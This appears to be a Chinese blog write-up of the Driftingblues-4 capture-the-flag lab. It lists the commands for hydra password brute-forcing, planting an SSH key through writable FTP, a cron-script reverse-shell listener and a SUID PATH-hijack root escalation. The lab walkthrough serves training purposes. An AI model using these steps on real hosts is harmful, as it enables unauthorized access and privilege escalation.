Hackmyvm综合靶机 | Driftingblues-4

最新推荐文章于 2023-05-30 11:30:00 发布
最新推荐文章于 2023-05-30 11:30:00 发布
阅读量1.8k 收藏
点赞数 2
分类专栏: # 靶场WP 文章标签: 安全 web安全 渗透测试 靶机
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45996361/article/details/124107243
版权

前言提要

​ 4.7号晚,接收建议。

​ 我是否太注重于打靶?更应该多了解了解常见的框架比如Spring、Apache等以及多积累相关经验,捋清楚自己的思绪。

​ 后期的博客应该会多多更新常见CMS的相关知识,以及一些代码的编写…(把这系列靶机打完后,多更多设计其他知识不仅限于靶机wp)

kali:192.168.132.139

靶机:192.168.132.172

信息收集

#先简单扫端口
nmap -p- 192.168.132.172
#再全面扫面
nmap -A -sV -p- -T4 192.168.132.172

image-20220408163839440

开放端口21、22、80(常规想法:21和22端口日常爆破,去80端口的web页面进一步信息收集)

页面没东西,但是在源代码里面有一串密文

Z28gYmFjayBpbnRydWRlciEhISBkR2xuYUhRZ2MyVmpkWEpwZEhrZ1pISnBjSEJwYmlCaFUwSnZZak5DYkVsSWJIWmtVMlI1V2xOQ2FHSnBRbXhpV0VKellqTnNiRnBUUWsxTmJYZ3dWMjAxVjJGdFJYbGlTRlpoVFdwR2IxZHJUVEZOUjFaSlZWUXdQUT09

#四次解密后得到一个隐藏目录
/imfuckingmad.txt

去隐藏目录看一看又是一个奇怪的加密,寻找解密方式

http://www.dcode.fr/cipher-identifier

发现是 Brainfuck 解密,然后进行解密
得到一张二维码: /iTiS3Cr3TbiTCh.png

然后去在线二维码解密得到一个网址:https://i.imgur.com/a4JjS76.png

image-20220407162737606

去到页面发现一些账号名字,记下来放进user.txt

拿着账号去爆破FTP和SSH(利用的是本地的密码本rockyou)

hydra -L user.txt -P /usr/share/wordlists/rockyou.txt 192.168.132.172 ssh
hydra -L user.txt -P /usr/share/wordlists/rockyou.txt 192.168.132.172 ftp

image-20220408164951311

然后是爆破了ftp的账号:luther 密码:mypics

成功登陆ftp,发现hubert的目录权限可以任意读写

然而进入hubert却什么东西都没有

ftp 192.168.132.172
ls
cd hubert
ls -al

image-20220408163516844

公私钥登陆

考虑在hubert用户的目录下写下私钥来进行免密登陆

本地生成公钥对

把公钥复制成authorized_keys文件image-20220407163536583

在家目录下创建.ssh目录,然后将kali的公钥上传到该目录下

mkdir .ssh
cd .ssh
put authorized_keys

ssh hubert@192.168.132.166 -i key

image-20220408162134306

image-20220408162313815

提权

在本地目录下有一个py文件,打开看一看

属主是root且内容执行的是系统命令

image-20220408162420662

判断该程序是否为定时任务(下载pspy64)

wget http://192.168.111.7/pspy64
chmod +x pspy64
./pspy64

发现该py文件一分钟执行一次,所以我们可以利用定时任务获取root权限

使用nano修改文件写入反弹shell,并保存为emrgency.pye

然后再次进行覆盖

nano emergency.py
ls
mv emergency.pye emergency.py
cat emergency.py

image-20220408163134170

在kali本机监听,等待反弹shell成功即可获取root

nc -lvnp 3333

在这里插入图片描述

第二种提权:使用环境变量进行命令劫持提权

这个提权步骤是和blues3一模一样的

搜索一下具有suid权限的命令

find / -perm -u=s -type f 2>/dev/null

image-20220406194732333

发现一个getinfo命令

执行一下发现,这个命令集合了(系统命令)

ifconfig
cat /etc/hosts
uname -a

所以思路:修改其中一个命令即可获取root权限

这里既然调用了系统命令,那么我们可以自行编写一个同名文件,比如说cat,因为我们猜测getinfo中使用了cat命令,如若我们可以添加环境变量,getinfo在调用命令时首先检索环境变量就会调用到我们伪造的cat,执行我们想要的命令,来达到提权的效果,即使用环境变量进行命令劫持提权

因此,在这种情况下,我们可以在环境变量 PATH 中提供一个目录 (/tmp),并创建一
个 ip 或者 cat 文件,用于劫持命令,执行我们自定义的二进制文件就可以提权:
export PATH=/tmp/:$PATH     把/tmp路径加入到系统路径中。
cd /tmp						
echo '/bin/bash' > ip		把/bin/bash写入到ip中。
chmod +x ip					增加执行权限
/usr/bin/getinfo

image-20220408164917217

image-20220406195314111

1erkeU
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Hackmyvm综合靶机 | Driftingblues-1
IerkeU的博客
04-01 3138
前提概要 靶场地址:https://www.vulnhub.com/entry/driftingblues-1,625/,是一个极其简单的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / nmap下的工具) 二珂说:这个靶机系列是跟着新仔一起入坑的,他太卷了,咱们也不能速度太慢了!!!后面还会再次复习DC靶机的实现过程… 信息收集 arp-scan 192.168.132.0/24 之前都是扫出目标后就之间nmap一把梭 后面了解到这样容易暴露目标 所以
kali渗透综合靶机(十五)--Breach-1.0靶机
W小哥
04-01 2120
一、靶机下载 下载链接:https://download.vulnhub.com/breach/Breach-1.0.zip 二、Breach-1.0靶机搭建 将下载好的靶机环境,用VMware导入即可使用,文件->打开 导入到合适位置即可,默认是C盘,成功导入虚拟机之后,打开即可 三、攻击过程 VM虚机配置有静态IP地址(192.168.110.140),需要将虚拟机网卡设置为ho...
综合靶机渗透测试解析
w_j_x_123的博客
05-30 472
7.root家目录下存在一个***.txt文件,文件名+文件内容当作flag提交,用+号连接(例:***.txt+qwoingqwoighoqisfhoasf)7.root家目录下存在一个***.txt文件,文件名+文件内容当作flag提交,用+号连接(例:***.txt+qwoingqwoighoqisfhoasf)6.在kali中搜索该提权漏洞,并将漏洞的披露时间当作flag值提交.(例:2023-05-26);1. 扫描目标靶机靶机开放的所有端口,当作 flag 提交(例:21,22,23)
2021-12-16 综合靶机实验
夕阳的街道的博客
12-16 2825
一、实验题目:综合靶机实验 二、实验内容: 1.使用msf搜索可利用漏洞(drupal) 2. 寻找目标网站的配置文件 3.数据库管理员提权(更新管理员密码或者添加一个新用户) 4. suid提权的命令(nmap、vim、find、bash、more、less、nano、cp) 三、实验环境: 1.kali虚拟机:192.168.112.130 2. 靶机:192.168.112.138 四、实验步骤: 1.搜索存活靶机,输入命令: masscan 网段 -p 80 ..
kali渗透综合靶机(十六)--evilscience靶机
W小哥
04-02 1010
https://download.vulnhub.com/theether/theEther_1.0.1.zip
dc-4靶机练习.docx
01-02
第一步;靶机web信息收集,burp获取登陆用户名和密码。 第二步:利用反弹shell后发现一封邮件,拿到新... 第三步:通过sudo -l]发现不用登录root可以使用的命令 [teehee --help][teehee -a]增加用户,具有root权限
vulnhub靶机实战-My-cmsms靶机
最新发布
09-29
vulnhub靶机实战-My-cmsms靶机
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
kali渗透综合靶机(十二)--SickOs1.2靶机
W小哥
03-30 1589
一、靶机下载 下载链接:https://download.vulnhub.com/sickos/sick0s1.2.zip 二、SickOs1.2靶机搭建 将下载好的靶机环境,用VMware导入即可使用,文件->打开 导入到合适位置即可,默认是C盘,成功导入虚拟机之后,打开即可 三、攻击过程 kali IP:192.168.212.6 靶机IP:192.168.212.9 1、主机发...
kali渗透综合靶机(二)--bulldog靶机
W小哥
03-07 925
一、靶机下载 靶机下载地址:https://download.vulnhub.com/bulldog/bulldog.ova 二、bulldog靶机搭建 靶机: 将下载好的靶机环境,用VM VirtualBox导入即可使用,管理->导入虚拟电脑 设置网络模式,网卡选择仅主机模式 kali攻击机: 点开vmware中的虚拟选项编辑器中 点击更改设置,让vmware桥接至VirtualBox...
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-1 通关详解 (附靶机搭建教程)
qq_51577576的博客
03-14 6882
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-1 通关详解 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
kali渗透综合靶机(十三)--Dina 1.0靶机
WY92139010的博客
06-03 660
kali渗透综合靶机(十三)--Dina 1.0靶机 一、主机发现 1.netdiscover -i eth0 -r 192.168.10.0/24    二、端口扫描 1. masscan --rate=10000 -p0-65535 192.168.10.181    三、端口服务识别 1. nmap -sV -T4 -O -p ,80 192.168.10.181 ...
kali渗透综合靶机(六)--FristiLeaks靶机
W小哥
03-11 1394
一、靶机下载 下载链接:https://download.vulnhub.com/fristileaks/FristiLeaks_1.3.ova 二、FristiLeaks靶机搭建 将下载好的靶机环境,用VMware导入即可使用,文件->打开 导入到合适位置即可,默认是C盘,成功导入虚拟机之后,打开即可 三、攻击过程 kali IP:192.168.27.128 靶机IP:192.1...
漏洞payload 靶机_kali渗透综合靶机(十六)--evilscience靶机
weixin_34239718的博客
12-23 437
kali渗透综合靶机(十六)--evilscience靶机一、主机发现1.netdiscover -i eth0 -r 192.168.10.0/24二、端口扫描1. masscan --rate=10000 -p0-65535 192.168.10.195三、端口服务识别1. nmap -sV -T4 -O -p 22,80 192.168.10.195四、漏洞查找与利用1.目录扫描2. 发现h...
Hackmyvm综合靶机 | Driftingblues-6
IerkeU的博客
04-14 2795
hackmyvm入门(靶机网络配置)
Bu2n的博客
04-13 6026
hackmyvm概述hackmyvm靶机下载地址靶机网络配置测试环境环境搭建愉快玩耍 hackmyvm概述 hackmyvm是一个平台,包含了大量靶机,类似于vulnhub、hackthebox等平台,你可以在上面下载靶机,进行渗透测试练习,非常适合热爱黑客技术或从事渗透测试的人员。我个人觉得,hackmyvm相比vulnhub好的地方在于它的靶机所占磁盘空间小,hackmyvm靶机一般在1G左右,而vulnhub靶机动不动就2G,甚至我见过还有6G的。不扯这些了,今天是聊一聊hackmyvm到底怎么玩.
Hackmyvm综合靶机 | Driftingblues-9(完结)
IerkeU的博客
04-20 600
缓冲区溢出提权
例举使用Nmap工具对靶机Metasploitable2-XP和Metasploitable2-Linux进行端口扫描
05-26
4. 分析扫描结果,确定可能存在的漏洞和安全风险,并采取相应的措施加强主机的安全防护。 总之,使用Nmap工具可以帮助我们快速发现目标主机的端口和服务,从而评估主机的安全风险,并采取措施加强主机的安全防护。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

1erkeU

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值